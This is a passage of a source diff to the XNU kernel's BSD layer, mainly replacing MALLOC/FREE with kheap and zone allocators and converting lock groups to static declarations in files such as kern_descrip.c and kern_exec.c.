SYSCTL_INT(_vm, OID_AUTO, cs_debug, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_debug, 0, ""); @@ -195,10 +193,6 @@ cs_init(void) sizeof(cs_library_val_enable)); #endif #endif /* !SECURE_KERNEL */ - - lck_grp_attr_t *attr = lck_grp_attr_alloc_init(); - cs_lockgrp = lck_grp_alloc_init("KERNCS", attr); - lck_grp_attr_free(attr); } STARTUP(CODESIGNING, STARTUP_RANK_FIRST, cs_init); @@ -474,7 +468,7 @@ csblob_get_size(struct cs_blob *blob) vm_address_t csblob_get_addr(struct cs_blob *blob) { - return blob->csb_mem_kaddr; + return (vm_address_t)blob->csb_mem_kaddr; } /* @@ -1553,7 +1547,7 @@ cs_blob_get(proc_t p, void **out_start, size_t *out_length) return 0; } - *out_start = (void *)csblob->csb_mem_kaddr; + *out_start = csblob->csb_mem_kaddr; *out_length = csblob->csb_mem_size; return 0; diff --git a/bsd/kern/kern_descrip.c b/bsd/kern/kern_descrip.c index 8e7f964f6..8952d0220 100644 --- a/bsd/kern/kern_descrip.c +++ b/bsd/kern/kern_descrip.c @@ -124,7 +124,7 @@ #include #include -#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 +#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 kern_return_t ipc_object_copyin(ipc_space_t, mach_port_name_t, mach_msg_type_name_t, ipc_port_t *, mach_port_context_t, mach_msg_guard_flags_t *, uint32_t); void ipc_port_release_send(ipc_port_t); @@ -145,8 +145,6 @@ int unlink1(vfs_context_t, vnode_t, user_addr_t, enum uio_seg, int); static void fdrelse(struct proc * p, int fd); -extern void file_lock_init(void); - extern kauth_scope_t kauth_scope_fileop; /* Conflict wait queue for when selects collide (opaque type) */ @@ -181,6 +179,11 @@ ZONE_DECLARE(fp_zone, "fileproc", sizeof(struct fileproc), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM); ZONE_DECLARE(fdp_zone, "filedesc", sizeof(struct filedesc), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM); +/* + * If you need accounting for KM_OFILETABL consider using + * KALLOC_HEAP_DEFINE to define a view. + */ +#define KM_OFILETABL KHEAP_DEFAULT /* * Descriptor management. @@ -192,9 +195,7 @@ int nfiles; /* actual number of open files */ static const struct fileops uninitops; os_refgrp_decl(, f_refgrp, "files refcounts", NULL); -lck_grp_attr_t * file_lck_grp_attr; -lck_grp_t * file_lck_grp; -lck_attr_t * file_lck_attr; +static LCK_GRP_DECLARE(file_lck_grp, "file"); #pragma mark fileglobs @@ -217,7 +218,7 @@ fg_free(struct fileglob *fg) if (IS_VALID_CRED(fg->fg_cred)) { kauth_cred_unref(&fg->fg_cred); } - lck_mtx_destroy(&fg->fg_lock, file_lck_grp); + lck_mtx_destroy(&fg->fg_lock, &file_lck_grp); #if CONFIG_MACF mac_file_label_destroy(fg); @@ -396,30 +397,6 @@ check_file_seek_range(struct flock *fl, off_t cur_file_offset) } -/* - * file_lock_init - * - * Description: Initialize the file lock group and the uipc and flist locks - * - * Parameters: (void) - * - * Returns: void - * - * Notes: Called at system startup from bsd_init(). - */ -void -file_lock_init(void) -{ - /* allocate file lock group attribute and group */ - file_lck_grp_attr = lck_grp_attr_alloc_init(); - - file_lck_grp = lck_grp_alloc_init("file", file_lck_grp_attr); - - /* Allocate file lock attribute */ - file_lck_attr = lck_attr_alloc_init(); -} - - void proc_dirs_lock_shared(proc_t p) { @@ -1934,11 +1911,8 @@ sys_fcntl_nocancel(proc_t p, struct fcntl_nocancel_args *uap, int32_t *retval) proc_fdunlock(p); pathlen = MAXPATHLEN; - MALLOC(pathbufp, char *, pathlen, M_TEMP, M_WAITOK); - if (pathbufp == NULL) { - error = ENOMEM; - goto outdrop; - } + pathbufp = zalloc(ZV_NAMEI); + if ((error = vnode_getwithref(vp)) == 0) { if (uap->cmd == F_GETPATH_NOFIRMLINK) { error = vn_getpath_ext(vp, NULL, pathbufp, &pathlen, VN_GETPATH_NO_FIRMLINK); @@ -1951,7 +1925,7 @@ sys_fcntl_nocancel(proc_t p, struct fcntl_nocancel_args *uap, int32_t *retval) error = copyout((caddr_t)pathbufp, argp, pathlen); } } - FREE(pathbufp, M_TEMP); + zfree(ZV_NAMEI, pathbufp); goto outdrop; } @@ -2612,9 +2586,12 @@ dropboth: .len = CP_MAX_WRAPPEDKEYSIZE, }; - MALLOC(k.key, char *, k.len, M_TEMP, M_WAITOK | M_ZERO); - - error = VNOP_IOCTL(vp, F_TRANSCODEKEY, (caddr_t)&k, 1, &context); + k.key = kheap_alloc(KHEAP_TEMP, CP_MAX_WRAPPEDKEYSIZE, Z_WAITOK | Z_ZERO); + if (k.key == NULL) { + error = ENOMEM; + } else { + error = VNOP_IOCTL(vp, F_TRANSCODEKEY, (caddr_t)&k, 1, &context); + } vnode_put(vp); @@ -2623,7 +2600,7 @@ dropboth: *retval = k.len; } - FREE(k.key, M_TEMP); + kheap_free(KHEAP_TEMP, k.key, CP_MAX_WRAPPEDKEYSIZE); break; } @@ -3019,11 +2996,8 @@ dropboth: proc_fdunlock(p); pathlen = MAXPATHLEN; - MALLOC(pathbufp, char *, pathlen, M_TEMP, M_WAITOK); - if (pathbufp == NULL) { - error = ENOMEM; - goto outdrop; - } + pathbufp = zalloc(ZV_NAMEI); + if ((error = vnode_getwithref(vp)) == 0) { int backingstore = 0; @@ -3051,7 +3025,8 @@ dropboth: (void)vnode_put(vp); } } - FREE(pathbufp, M_TEMP); + + zfree(ZV_NAMEI, pathbufp); goto outdrop; } @@ -3860,14 +3835,14 @@ fdalloc(proc_t p, int want, int *result) numfiles = (int)lim; } proc_fdunlock(p); - MALLOC(newofiles, struct fileproc **, - numfiles * OFILESIZE, M_OFILETABL, M_WAITOK); + newofiles = kheap_alloc(KM_OFILETABL, numfiles * OFILESIZE, + Z_WAITOK); proc_fdlock(p); if (newofiles == NULL) { return ENOMEM; } if (fdp->fd_nfiles >= numfiles) { - FREE(newofiles, M_OFILETABL); + kheap_free(KM_OFILETABL, newofiles, numfiles * OFILESIZE); continue; } newofileflags = (char *) &newofiles[numfiles]; @@ -3890,7 +3865,7 @@ fdalloc(proc_t p, int want, int *result) fdp->fd_ofiles = newofiles; fdp->fd_ofileflags = newofileflags; fdp->fd_nfiles = numfiles; - FREE(ofiles, M_OFILETABL); + kheap_free(KM_OFILETABL, ofiles, oldnfiles * OFILESIZE); fdexpand++; } } @@ -4602,7 +4577,7 @@ falloc_withalloc(proc_t p, struct fileproc **resultfp, int *resultfd, return ENOMEM; } fg = zalloc_flags(fg_zone, Z_WAITOK | Z_ZERO); - lck_mtx_init(&fg->fg_lock, file_lck_grp, file_lck_attr); + lck_mtx_init(&fg->fg_lock, &file_lck_grp, LCK_ATTR_NULL); os_ref_retain_locked(&fp->fp_iocount); os_ref_init_raw(&fg->fg_count, &f_refgrp); @@ -4880,8 +4855,8 @@ fdcopy(proc_t p, vnode_t uth_cdir) } proc_fdunlock(p); - MALLOC(newfdp->fd_ofiles, struct fileproc **, - i * OFILESIZE, M_OFILETABL, M_WAITOK); + newfdp->fd_ofiles = kheap_alloc(KM_OFILETABL, i * OFILESIZE, + Z_WAITOK | Z_ZERO); if (newfdp->fd_ofiles == NULL) { if (newfdp->fd_cdir) { vnode_rele(newfdp->fd_cdir); @@ -4893,7 +4868,6 @@ fdcopy(proc_t p, vnode_t uth_cdir) zfree(fdp_zone, newfdp); return NULL; } - (void) memset(newfdp->fd_ofiles, 0, i * OFILESIZE); proc_fdlock(p); newfdp->fd_ofileflags = (char *) &newfdp->fd_ofiles[i]; @@ -4960,8 +4934,8 @@ fdcopy(proc_t p, vnode_t uth_cdir) newfdp->fd_kqhash = NULL; newfdp->fd_kqhashmask = 0; newfdp->fd_wqkqueue = NULL; - lck_mtx_init(&newfdp->fd_kqhashlock, proc_kqhashlock_grp, proc_lck_attr); - lck_mtx_init(&newfdp->fd_knhashlock, proc_knhashlock_grp, proc_lck_attr); + lck_mtx_init(&newfdp->fd_kqhashlock, &proc_kqhashlock_grp, &proc_lck_attr); + lck_mtx_init(&newfdp->fd_knhashlock, &proc_knhashlock_grp, &proc_lck_attr); return newfdp; } @@ -5027,7 +5001,7 @@ fdfree(proc_t p) proc_fdlock(p); } } - FREE(fdp->fd_ofiles, M_OFILETABL); + kheap_free(KM_OFILETABL, fdp->fd_ofiles, fdp->fd_nfiles * OFILESIZE); fdp->fd_ofiles = NULL; fdp->fd_nfiles = 0; } @@ -5060,8 +5034,8 @@ fdfree(proc_t p) hashdestroy(fdp->fd_kqhash, M_KQUEUE, fdp->fd_kqhashmask); } - lck_mtx_destroy(&fdp->fd_kqhashlock, proc_kqhashlock_grp); - lck_mtx_destroy(&fdp->fd_knhashlock, proc_knhashlock_grp); + lck_mtx_destroy(&fdp->fd_kqhashlock, &proc_kqhashlock_grp); + lck_mtx_destroy(&fdp->fd_knhashlock, &proc_knhashlock_grp); zfree(fdp_zone, fdp); } @@ -5434,7 +5408,7 @@ sys_fileport_makefd(proc_t p, struct fileport_makefd_args *uap, int32_t *retval) int err; res = ipc_object_copyin(get_task_ipcspace(p->task), - send, MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + send, MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); if (res == KERN_SUCCESS) { err = fileport_makefd(p, port, UF_EXCLOSE, retval); diff --git a/bsd/kern/kern_event.c b/bsd/kern/kern_event.c index 0593bcb08..f3277df75 100644 --- a/bsd/kern/kern_event.c +++ b/bsd/kern/kern_event.c @@ -132,7 +132,11 @@ extern int cansignal(struct proc *, kauth_cred_t, struct proc *, int); /* bsd/ke #define KEV_EVTID(code) BSDDBG_CODE(DBG_BSD_KEVENT, (code)) -MALLOC_DEFINE(M_KQUEUE, "kqueue", "memory for kqueue system"); +/* + * If you need accounting for KM_KQUEUE consider using + * KALLOC_HEAP_DEFINE to define a zone view. + */ +#define KM_KQUEUE KHEAP_DEFAULT #define KQ_EVENT NO_EVENT64 @@ -3474,8 +3478,8 @@ knotes_dealloc(proc_t p) } } /* free the table */ - FREE(fdp->fd_knlist, M_KQUEUE); - fdp->fd_knlist = NULL; + kheap_free(KM_KQUEUE, fdp->fd_knlist, + fdp->fd_knlistsize * sizeof(struct klist *)); } fdp->fd_knlistsize = 0; @@ -6366,8 +6370,8 @@ kq_add_knote(struct kqueue *kq, struct knote *kn, struct knote_lock_ctx *knlc, goto out_locked; } - MALLOC(list, struct klist *, - size * sizeof(struct klist *), M_KQUEUE, M_WAITOK); + list = kheap_alloc(KM_KQUEUE, size * sizeof(struct klist *), + Z_WAITOK); if (list == NULL) { ret = ENOMEM; goto out_locked; @@ -6378,7 +6382,8 @@ kq_add_knote(struct kqueue *kq, struct knote *kn, struct knote_lock_ctx *knlc, bzero((caddr_t)list + fdp->fd_knlistsize * sizeof(struct klist *), (size - fdp->fd_knlistsize) * sizeof(struct klist *)); - FREE(fdp->fd_knlist, M_KQUEUE); + kheap_free(KM_KQUEUE, fdp->fd_knlist, + fdp->fd_knlistsize * sizeof(struct klist *)); fdp->fd_knlist = list; fdp->fd_knlistsize = size; } @@ -8551,7 +8556,7 @@ kevt_pcblist SYSCTL_HANDLER_ARGS ROUNDUP64(sizeof(struct xsockstat_n)); struct kern_event_pcb *ev_pcb; - buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO); + buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO); if (buf == NULL) { return ENOMEM; } @@ -8643,10 +8648,7 @@ kevt_pcblist SYSCTL_HANDLER_ARGS done: lck_rw_done(&kev_rwlock); - if (buf != NULL) { - FREE(buf, M_TEMP); - } - + kheap_free(KHEAP_TEMP, buf, item_size); return error; } @@ -8982,10 +8984,7 @@ pid_kqueue_extinfo(proc_t p, struct kqueue *kq, user_addr_t ubuf, err = copyout(kqext, ubuf, sizeof(struct kevent_extinfo) * MIN(buflen, nknotes)); out: - if (kqext) { - kheap_free(KHEAP_TEMP, kqext, buflen * sizeof(struct kevent_extinfo)); - kqext = NULL; - } + kheap_free(KHEAP_TEMP, kqext, buflen * sizeof(struct kevent_extinfo)); if (!err) { *retval = (int32_t)MIN(nknotes, PROC_PIDFDKQUEUE_KNOTES_MAX); diff --git a/bsd/kern/kern_exec.c b/bsd/kern/kern_exec.c index e8a1e25e0..7eef9034f 100644 --- a/bsd/kern/kern_exec.c +++ b/bsd/kern/kern_exec.c @@ -253,7 +253,7 @@ task_t convert_port_to_task(ipc_port_t port); /* * Mach things for which prototypes are unavailable from Mach headers */ -#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 +#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1 void ipc_task_reset( task_t task); void ipc_thread_reset( @@ -1192,7 +1192,9 @@ grade: vm_map_set_user_wire_limit(map, (vm_size_t)proc_limitgetcur(p, RLIMIT_MEMLOCK, FALSE)); #if XNU_TARGET_OS_OSX if (p->p_platform == PLATFORM_IOS) { - vm_map_mark_alien(map); + assert(vm_map_is_alien(map)); + } else { + assert(!vm_map_is_alien(map)); } #endif /* XNU_TARGET_OS_OSX */ proc_unlock(p); @@ -1359,6 +1361,14 @@ grade: int cputype = cpu_type(); vm_map_exec(map, task, load_result.is_64bit_addr, (void *)p->p_fd->fd_rdir, cputype, cpu_subtype, reslide); +#if XNU_TARGET_OS_OSX +#define SINGLE_JIT_ENTITLEMENT "com.apple.security.cs.single-jit" + + if (IOTaskHasEntitlement(task, SINGLE_JIT_ENTITLEMENT)) { + vm_map_single_jit(map); + } +#endif /* XNU_TARGET_OS_OSX */ + /* * Close file descriptors which specify close-on-exec. */ @@ -1780,7 +1790,7 @@ exec_activate_image(struct image_params *imgp) /* Use excpath, which contains the copyin-ed exec path */ DTRACE_PROC1(exec, uintptr_t, excpath); - MALLOC(ndp, struct nameidata *, sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO); + ndp = kheap_alloc(KHEAP_TEMP, sizeof(*ndp), Z_WAITOK | Z_ZERO); if (ndp == NULL) { error = ENOMEM; goto bad_notrans; @@ -1927,9 +1937,7 @@ bad_notrans: if (imgp->ip_ndp) { nameidone(imgp->ip_ndp); } - if (ndp) { - FREE(ndp, M_TEMP); - } + kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp)); return error; } @@ -2184,7 +2192,7 @@ exec_handle_port_actions(struct image_params *imgp, if (MACH_PORT_VALID(act->new_port)) { kr = ipc_object_copyin(get_task_ipcspace(current_task()), act->new_port, MACH_MSG_TYPE_COPY_SEND, - (ipc_object_t *) &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + (ipc_object_t *) &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); if (kr != KERN_SUCCESS) { ret = EINVAL; @@ -2329,7 +2337,8 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags) int mode = psfa->psfaa_openargs.psfao_mode; int origfd; - MALLOC(bufp, char *, sizeof(*vap) + sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO); + bufp = kheap_alloc(KHEAP_TEMP, + sizeof(*vap) + sizeof(*ndp), Z_WAITOK | Z_ZERO); if (bufp == NULL) { error = ENOMEM; break; @@ -2356,7 +2365,7 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags) fileproc_alloc_init, NULL, &origfd); - FREE(bufp, M_TEMP); + kheap_free(KHEAP_TEMP, bufp, sizeof(*vap) + sizeof(*ndp)); AUDIT_SUBCALL_EXIT(uthread, error); @@ -2411,7 +2420,7 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags) kr = ipc_object_copyin(get_task_ipcspace(current_task()), psfa->psfaa_fileport, MACH_MSG_TYPE_COPY_SEND, - (ipc_object_t *) &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND); + (ipc_object_t *) &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND); if (kr != KERN_SUCCESS) { error = EINVAL; @@ -2606,13 +2615,27 @@ exec_spawnattr_getmacpolicyinfo(const void *macextensions, const char *policynam return NULL; } +static void +spawn_free_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, + _posix_spawn_mac_policy_extensions_t psmx, int count) +{ + if (psmx == NULL) { + return; + } + for (int i = 0; i < count; i++) { + _ps_mac_policy_extension_t *ext = &psmx->psmx_extensions[i]; + kheap_free(KHEAP_TEMP, ext->datap, (vm_size_t) ext->datalen); + } + kheap_free(KHEAP_TEMP, psmx, px_args->mac_extensions_size); +} + static int -spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _posix_spawn_mac_policy_extensions_t *psmxp) +spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, + _posix_spawn_mac_policy_extensions_t *psmxp) { _posix_spawn_mac_policy_extensions_t psmx = NULL; int error = 0; int copycnt = 0; - int i = 0; *psmxp = NULL; @@ -2622,8 +2645,14 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p goto bad; } - MALLOC(psmx, _posix_spawn_mac_policy_extensions_t, px_args->mac_extensions_size, M_TEMP, M_WAITOK); - if ((error = copyin(px_args->mac_extensions, psmx, px_args->mac_extensions_size)) != 0) { + psmx = kheap_alloc(KHEAP_TEMP, px_args->mac_extensions_size, Z_WAITOK); + if (psmx == NULL) { + error = ENOMEM; + goto bad; + } + + error = copyin(px_args->mac_extensions, psmx, px_args->mac_extensions_size); + if (error) { goto bad; } @@ -2633,7 +2662,7 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p goto bad; } - for (i = 0; i < psmx->psmx_count; i++) { + for (int i = 0; i < psmx->psmx_count; i++) { _ps_mac_policy_extension_t *extension = &psmx->psmx_extensions[i]; if (extension->datalen == 0 || extension->datalen > PAGE_SIZE) { error = EINVAL; @@ -2650,9 +2679,15 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p goto bad; } #endif - MALLOC(data, void *, (size_t)extension->datalen, M_TEMP, M_WAITOK); - if ((error = copyin((user_addr_t)extension->data, data, (size_t)extension->datalen)) != 0) { - FREE(data, M_TEMP); + data = kheap_alloc(KHEAP_TEMP, (vm_size_t) extension->datalen, Z_WAITOK); + if (data == NULL) { + error = ENOMEM; + goto bad; + } + error = copyin((user_addr_t)extension->data, data, (size_t)extension->datalen); + if (error) { + kheap_free(KHEAP_TEMP, data, (vm_size_t) extension->datalen); + error = ENOMEM; goto bad; } extension->datap = data; @@ -2662,28 +2697,9 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p return 0; bad: - if (psmx != NULL) { - for (i = 0; i < copycnt; i++) { - FREE(psmx->psmx_extensions[i].datap, M_TEMP); - } - FREE(psmx, M_TEMP); - } + spawn_free_macpolicyinfo(px_args, psmx, copycnt); return error; } - -static void -spawn_free_macpolicyinfo(_posix_spawn_mac_policy_extensions_t psmx) -{ - int i; - - if (psmx == NULL) { - return; - } - for (i = 0; i < psmx->psmx_count; i++) { - FREE(psmx->psmx_extensions[i].datap, M_TEMP); - } - FREE(psmx, M_TEMP); -} #endif /* CONFIG_MACF */ #if CONFIG_COALITIONS @@ -3064,7 +3080,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) * Allocate a big chunk for locals instead of using stack since these * structures are pretty big. */ - MALLOC(bufp, char *, (sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)), M_TEMP, M_WAITOK | M_ZERO); + bufp = kheap_alloc(KHEAP_TEMP, + sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap), Z_WAITOK | Z_ZERO); imgp = (struct image_params *) bufp; if (bufp == NULL) { error = ENOMEM; @@ -3148,7 +3165,9 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) error = EINVAL; goto bad; } - MALLOC(px_sfap, _posix_spawn_file_actions_t, px_args.file_actions_size, M_TEMP, M_WAITOK); + + px_sfap = kheap_alloc(KHEAP_TEMP, + px_args.file_actions_size, Z_WAITOK); if (px_sfap == NULL) { error = ENOMEM; goto bad; @@ -3175,8 +3194,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) goto bad; } - MALLOC(px_spap, _posix_spawn_port_actions_t, - px_args.port_actions_size, M_TEMP, M_WAITOK); + px_spap = kheap_alloc(KHEAP_TEMP, + px_args.port_actions_size, Z_WAITOK); if (px_spap == NULL) { error = ENOMEM; goto bad; @@ -3204,7 +3223,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) goto bad; } - MALLOC(px_persona, struct _posix_spawn_persona_info *, px_args.persona_info_size, M_TEMP, M_WAITOK | M_ZERO); + px_persona = kheap_alloc(KHEAP_TEMP, + px_args.persona_info_size, Z_WAITOK); if (px_persona == NULL) { error = ENOMEM; goto bad; @@ -3233,8 +3253,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) goto bad; } - MALLOC(px_pcred_info, struct _posix_spawn_posix_cred_info *, - px_args.posix_cred_info_size, M_TEMP, M_WAITOK | M_ZERO); + px_pcred_info = kheap_alloc(KHEAP_TEMP, + px_args.posix_cred_info_size, Z_WAITOK); if (px_pcred_info == NULL) { error = ENOMEM; goto bad; @@ -3270,7 +3290,7 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval) * ...AND the parent has the entitlement, copy * the subsystem root path in. */ - MALLOC(subsystem_root_path, char *, px_args.subsystem_root_path_size, M_SBUF, M_WAITOK | M_ZERO | M_NULL); + subsystem_root_path = zalloc_flags(ZV_NAMEI, Z_WAITOK | Z_ZERO); if (subsystem_root_path == NULL) { error = ENOMEM; @@ -4088,27 +4108,25 @@ bad: if (imgp->ip_strings) { execargs_free(imgp); } - if (imgp->ip_px_sfa != NULL) { - FREE(imgp->ip_px_sfa, M_TEMP); - } - if (imgp->ip_px_spa != NULL) { - FREE(imgp->ip_px_spa, M_TEMP); - } + kheap_free(KHEAP_TEMP, imgp->ip_px_sfa, + px_args.file_actions_size); + kheap_free(KHEAP_TEMP, imgp->ip_px_spa, + px_args.port_actions_size); #if CONFIG_PERSONAS - if (imgp->ip_px_persona != NULL) { - FREE(imgp->ip_px_persona, M_TEMP); - } + kheap_free(KHEAP_TEMP, imgp->ip_px_persona, + px_args.persona_info_size); #endif - if (imgp->ip_px_pcred_info != NULL) { - FREE(imgp->ip_px_pcred_info, M_TEMP); - } + kheap_free(KHEAP_TEMP, imgp->ip_px_pcred_info, + px_args.posix_cred_info_size); if (subsystem_root_path != NULL) { - FREE(subsystem_root_path, M_SBUF); + zfree(ZV_NAMEI, subsystem_root_path); } #if CONFIG_MACF - if (imgp->ip_px_smpx != NULL) { - spawn_free_macpolicyinfo(imgp->ip_px_smpx); + _posix_spawn_mac_policy_extensions_t psmx = imgp->ip_px_smpx; + if (psmx) { + spawn_free_macpolicyinfo(&px_args, + psmx, psmx->psmx_count); } if (imgp->ip_execlabelp) { mac_cred_label_free(imgp->ip_execlabelp); @@ -4263,9 +4281,8 @@ bad: proc_rele(p); } - if (bufp != NULL) { - FREE(bufp, M_TEMP); - } + kheap_free(KHEAP_TEMP, bufp, + sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)); if (inherit != NULL) { ipc_importance_release(inherit); @@ -4506,7 +4523,8 @@ __mac_execve(proc_t p, struct __mac_execve_args *uap, int32_t *retval) /* Allocate a big chunk for locals instead of using stack since these * structures a pretty big. */ - MALLOC(bufp, char *, (sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)), M_TEMP, M_WAITOK | M_ZERO); + bufp = kheap_alloc(KHEAP_TEMP, + sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap), Z_WAITOK | Z_ZERO); imgp = (struct image_params *) bufp; if (bufp == NULL) { error = ENOMEM; @@ -4794,9 +4812,8 @@ exit_with_error: proc_rele(p); } - if (bufp != NULL) { - FREE(bufp, M_TEMP); - } + kheap_free(KHEAP_TEMP, bufp, + sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)); if (inherit != NULL) { ipc_importance_release(inherit); @@ -5396,10 +5413,12 @@ extern uuid_string_t bootsessionuuid_string; #define PTRAUTH_DISABLED_FLAG "ptrauth_disabled=1" #define DYLD_ARM64E_ABI_KEY "arm64e_abi=" #endif /* __has_feature(ptrauth_calls) */ +#define MAIN_TH_PORT_KEY "th_port=" #define FSID_MAX_STRING "0x1234567890abcdef,0x1234567890abcdef" #define HEX_STR_LEN 18 // 64-bit hex value "0x0123456701234567" +#define HEX_STR_LEN32 10 // 32-bit hex value "0x01234567" static int exec_add_entropy_key(struct image_params *imgp, @@ -5453,6 +5472,8 @@ exec_add_apple_strings(struct image_params *imgp, { int error; int img_ptr_size = (imgp->ip_flags & IMGPF_IS_64BIT_ADDR) ? 8 : 4; + thread_t new_thread; + ipc_port_t sright; /* exec_save_path stored the first string */ imgp->ip_applec = 1; @@ -5658,6 +5679,26 @@ exec_add_apple_strings(struct image_params *imgp, imgp->ip_applec++; } #endif + /* + * Add main thread mach port name + * +1 uref on main thread port, this ref will be extracted by libpthread in __pthread_init + * and consumed in _bsdthread_terminate. Leaking the main thread port name if not linked + * against libpthread. + */ + if ((new_thread = imgp->ip_new_thread) != THREAD_NULL) { + thread_reference(new_thread); + sright = convert_thread_to_port_pinned(new_thread); + task_t new_task = get_threadtask(new_thread); + mach_port_name_t name = ipc_port_copyout_send(sright, get_task_ipcspace(new_task)); + char port_name_hex_str[strlen(MAIN_TH_PORT_KEY) + HEX_STR_LEN32 + 1]; + snprintf(port_name_hex_str, sizeof(port_name_hex_str), MAIN_TH_PORT_KEY "0x%x", name); + + error = exec_add_user_string(imgp, CAST_USER_ADDR_T(port_name_hex_str), UIO_SYSSPACE, FALSE); + if (error) { + goto bad; + } + imgp->ip_applec++; + } /* Align the tail of the combined applev area */ while (imgp->ip_strspace % img_ptr_size != 0) { @@ -6053,7 +6094,8 @@ handle_mac_transition: continue; } - MALLOC(ndp, struct nameidata *, sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO); + ndp = kheap_alloc(KHEAP_TEMP, + sizeof(*ndp), Z_WAITOK | Z_ZERO); if (ndp == NULL) { fp_free(p, indx, fp); error = ENOMEM; @@ -6066,7 +6108,7 @@ handle_mac_transition: if ((error = vn_open(ndp, flag, 0)) != 0) { fp_free(p, indx, fp); - FREE(ndp, M_TEMP); + kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp)); break; } @@ -6083,7 +6125,7 @@ handle_mac_transition: fp_drop(p, indx, fp, 1); proc_fdunlock(p); - FREE(ndp, M_TEMP); + kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp)); } } } @@ -6537,24 +6579,24 @@ load_return_to_errno(load_return_t lrtn) static int execargs_waiters = 0; -lck_mtx_t *execargs_cache_lock; +static LCK_MTX_DECLARE_ATTR(execargs_cache_lock, &proc_lck_grp, &proc_lck_attr); static void execargs_lock_lock(void) { - lck_mtx_lock_spin(execargs_cache_lock); + lck_mtx_lock_spin(&execargs_cache_lock); } static void execargs_lock_unlock(void) { - lck_mtx_unlock(execargs_cache_lock); + lck_mtx_unlock(&execargs_cache_lock); } static wait_result_t execargs_lock_sleep(void) { - return lck_mtx_sleep(execargs_cache_lock, LCK_SLEEP_DEFAULT, &execargs_free_count, THREAD_INTERRUPTIBLE); + return lck_mtx_sleep(&execargs_cache_lock, LCK_SLEEP_DEFAULT, &execargs_free_count, THREAD_INTERRUPTIBLE); } static kern_return_t diff --git a/bsd/kern/kern_exit.c b/bsd/kern/kern_exit.c index c38e6a898..e9dc75475 100644 --- a/bsd/kern/kern_exit.c +++ b/bsd/kern/kern_exit.c @@ -127,6 +127,7 @@ #include #include #include +#include #include #include @@ -935,8 +936,7 @@ exit_with_reason(proc_t p, int rv, int *retval, boolean_t thread_can_terminate, os_reason_free(exit_reason); if (current_proc() == p) { if (p->exit_thread == self) { - printf("exit_thread failed to exit, leaving process %s[%d] in unkillable limbo\n", - p->p_comm, p->p_pid); + panic("exit_thread failed to exit"); } if (thread_can_terminate) { @@ -1004,10 +1004,10 @@ exit_with_reason(proc_t p, int rv, int *retval, boolean_t thread_can_terminate, static void proc_memorystatus_remove(proc_t p) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); while (memorystatus_remove(p) == EAGAIN) { os_log(OS_LOG_DEFAULT, "memorystatus_remove: Process[%d] tried to exit while being frozen. Blocking exit until freeze completes.", p->p_pid); - msleep(&p->p_memstat_state, proc_list_mlock, PWAIT, "proc_memorystatus_remove", NULL); + msleep(&p->p_memstat_state, &proc_list_mlock, PWAIT, "proc_memorystatus_remove", NULL); } } #endif @@ -1069,6 +1069,58 @@ proc_prepareexit(proc_t p, int rv, boolean_t perf_notify) if (kr != 0) { create_corpse = TRUE; } + + /* + * Revalidate the code signing of the text pages around current PC. + * This is an attempt to detect and repair faults due to memory + * corruption of text pages. + * + * The goal here is to fixup infrequent memory corruptions due to + * things like aging RAM bit flips. So the approach is to only expect + * to have to fixup one thing per crash. This also limits the amount + * of extra work we cause in case this is a development kernel with an + * active memory stomp happening. + */ + task_t task = proc_task(p); + uintptr_t bt[2]; + int bt_err; + bool user64; + bool was_truncated; + unsigned int frame_count = backtrace_user(bt, 2, &bt_err, &user64, &was_truncated); + + if (bt_err == 0 && frame_count >= 